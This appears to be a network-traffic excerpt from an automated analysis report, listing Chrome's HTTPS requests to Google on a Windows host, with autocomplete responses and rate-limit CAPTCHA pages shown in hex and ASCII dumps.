                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:03 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            Content-Length: 458
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Set-Cookie: 1P_JAR=2024-04-29-20; expires=Wed, 29-May-2024 20:13:03 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                                                                                                                                            Set-Cookie: NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ; expires=Tue, 29-Oct-2024 20:13:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.2.449741142.250.191.1644437872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC1761INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGM_-v7EGIjC59ZRJ1dYmOVgs9zYixs7a6VS3cYG9RFenPtHDW-sQCDxbcp_6fD5d67UVJ_1caB4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                                                                                                                            x-hallmonitor-challenge: CgwIz_6_sQYQ-pX-3wESBFG1Plo
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:03 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            Content-Length: 417
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Set-Cookie: 1P_JAR=2024-04-29-20; expires=Wed, 29-May-2024 20:13:03 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                                                                                                                                            Set-Cookie: NID=513=cIMMZtqmh6t-ZNb5ohuS4PH2i61rW71JY7znO1ddH1_uceUi-6Hm3qZISAfahQZkGaLWOdZ9tV2lM-42s4Ly1VLL5UjczH-LAyhADw3FpSjptbMY6F-O211qsbcNlykvtRHjwWfwDAEecmDsqwdf9tK3HCDPSVXQDLhhjwSCwio; expires=Tue, 29-Oct-2024 20:13:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.2.449742142.250.191.1644437872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC1795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:04 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-GRlmJwVWtARpadfAbVq8jg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Viewport-Width
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Viewport-Height
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-DPR
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC1795INData Raw: 61 33 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 66 6c 69 67 68 74 73 22 2c 22 78 62 6f 78 20 69 6e 64 69 65 20 67 61 6d 65 20 73 68 6f 77 63 61 73 65 22 2c 22 63 68 61 6c 6c 65 6e 67 65 72 73 20 6d 6f 76 69 65 22 2c 22 74 61 6d 70 61 20 62 61 79 20 72 61 79 73 20 63 69 74 79 20 63 6f 6e 6e 65 63 74 20 75 6e 69 66 6f 72 6d 73 22 2c 22 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 65 73 22 2c 22 6d 69 6c 6c 69 6f 6e 20 64 6f 6c 6c 61 72 20 62 61 62 79 20 74 6f 6d 6d 79 20 72 69 63 68 6d 61 6e 20 6c 79 72 69 63 73 22 2c 22 72 6f 79 61 6c 20 63 61 72 69 62 62 65 61 6e 20 61 6c 61 73 6b 61 20 63 72 75 69 73 65 20 63 61 6e 63 65 6c 6c 65 64 22 2c 22 61 70 70 6c 65
                                                                                                                                                                                                                                                            Data Ascii: a36)]}'["",["southwest airlines flights","xbox indie game showcase","challengers movie","tampa bay rays city connect uniforms","spacex falcon 9 rocket launches","million dollar baby tommy richman lyrics","royal caribbean alaska cruise cancelled","apple
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC826INData Raw: 4a 56 33 64 6c 4d 30 6c 4e 4b 7a 64 50 61 6e 51 34 64 54 46 35 63 6e 4a 71 52 6c 42 69 53 6b 74 78 5a 55 59 30 56 6d 46 56 53 6b 56 6d 53 57 4e 72 5a 30 31 4e 59 6b 56 6e 61 47 64 45 4d 6b 6b 79 65 47 38 35 53 6e 5a 74 52 58 4e 73 57 46 56 46 56 6b 68 45 54 6b 78 45 4e 46 6b 31 4d 6d 70 52 5a 30 4a 77 61 6d 78 7a 63 56 4e 52 51 30 46 43 4b 31 6c 75 51 54 6c 74 4b 33 46 4d 4d 56 52 4f 57 6e 49 30 57 57 46 55 62 55 39 33 61 32 68 52 52 58 4e 57 65 57 56 74 56 6b 38 76 64 7a 42 52 63 58 41 33 65 46 46 35 54 46 56 57 53 7a 46 54 64 45 64 52 5a 57 56 54 52 6c 64 44 62 6d 4a 48 4e 56 42 31 4e 6d 64 6c 4e 31 4a 55 5a 31 64 70 62 6e 46 79 62 32 4a 30 56 6b 52 36 63 30 46 7a 55 6b 6b 7a 51 79 73 7a 4e 43 39 33 51 57 46 4a 5a 6e 6c 34 5a 6b 31 61 61 56 6c 48 65 57
                                                                                                                                                                                                                                                            Data Ascii: JV3dlM0lNKzdPanQ4dTF5cnJqRlBiSktxZUY0VmFVSkVmSWNrZ01NYkVnaGdEMkkyeG85SnZtRXNsWFVFVkhETkxENFk1MmpRZ0JwamxzcVNRQ0FCK1luQTltK3FMMVROWnI0WWFUbU93a2hRRXNWeWVtVk8vdzBRcXA3eFF5TFVWSzFTdEdRZWVTRldDbmJHNVB1NmdlN1JUZ1dpbnFyb2J0VkR6c0FzUkkzQyszNC93QWFJZnl4Zk1aaVlHeW
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC1255INData Raw: 35 32 65 0d 0a 6d 64 58 70 57 56 56 6f 31 4e 6b 59 78 56 31 56 71 51 6a 56 6f 61 30 56 68 52 31 55 78 65 58 49 32 54 57 73 7a 55 30 70 77 53 53 73 77 62 45 39 76 56 6d 78 51 64 54 4a 43 53 44 64 68 64 7a 4a 52 63 32 4a 4e 4d 56 46 78 62 7a 55 34 55 58 64 79 56 58 4a 6f 55 55 64 42 4d 48 45 77 62 47 52 6a 54 30 4d 31 52 6c 4a 76 64 6e 52 47 63 48 46 49 53 6c 64 49 55 47 31 6f 59 6e 5a 35 4b 32 35 77 63 54 52 59 56 33 46 79 64 6b 35 69 59 57 52 31 56 57 4a 6a 4f 56 4e 34 65 56 51 76 51 55 56 78 5a 6a 63 32 4d 31 45 79 4e 6e 42 79 4e 46 46 69 64 56 56 61 5a 30 35 73 57 45 39 43 4b 79 74 70 62 56 46 78 57 55 4e 43 56 6b 64 69 52 48 68 6f 57 6e 46 70 62 46 6f 77 63 55 56 71 62 44 56 54 56 6d 70 75 57 47 78 69 54 30 35 32 56 48 4a 77 5a 57 64 78 4e 31 5a 55 56
                                                                                                                                                                                                                                                            Data Ascii: 52emdXpWVVo1NkYxV1VqQjVoa0VhR1UxeXI2TWszU0pwSSswbE9vVmxQdTJCSDdhdzJRc2JNMVFxbzU4UXdyVXJoUUdBMHEwbGRjT0M1RlJvdnRGcHFISldIUG1oYnZ5K25wcTRYV3Fydk5iYWR1VWJjOVN4eVQvQUVxZjc2M1EyNnByNFFidVVaZ05sWE9CKytpbVFxWUNCVkdiRHhoWnFpbFowcUVqbDVTVmpuWGxiT052VHJwZWdxN1ZUV
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC78INData Raw: 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: sttype":["QUERY","QUERY","ENTITY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.2.449744142.250.191.1644437872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGM_-v7EGIjC59ZRJ1dYmOVgs9zYixs7a6VS3cYG9RFenPtHDW-sQCDxbcp_6fD5d67UVJ_1caB4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            Cookie: 1P_JAR=2024-04-29-20; NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:04 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Server: HTTP server (unknown)
                                                                                                                                                                                                                                                            Content-Length: 3111
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 49 5a 71 55 51 30 5a 37 5a 51 71 42 31 33 78 44 2d 34 6f 75 57 74 38 38 43 4d 6d 38 73 34 4d 5a 4b
                                                                                                                                                                                                                                                            Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="IZqUQ0Z7ZQqB13xD-4ouWt88CMm8s4MZK
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC957INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                                                                                                                                                                                            Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            10192.168.2.449745142.250.191.1644437872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC912OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGM_-v7EGIjCEhPLSBTrZPAY39cVYHNd6_L3Rxj8WO6tEohgLxJlwyjn4Ct7LVz-jrTx9H46727MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            Cookie: 1P_JAR=2024-04-29-20; NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:04 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/html
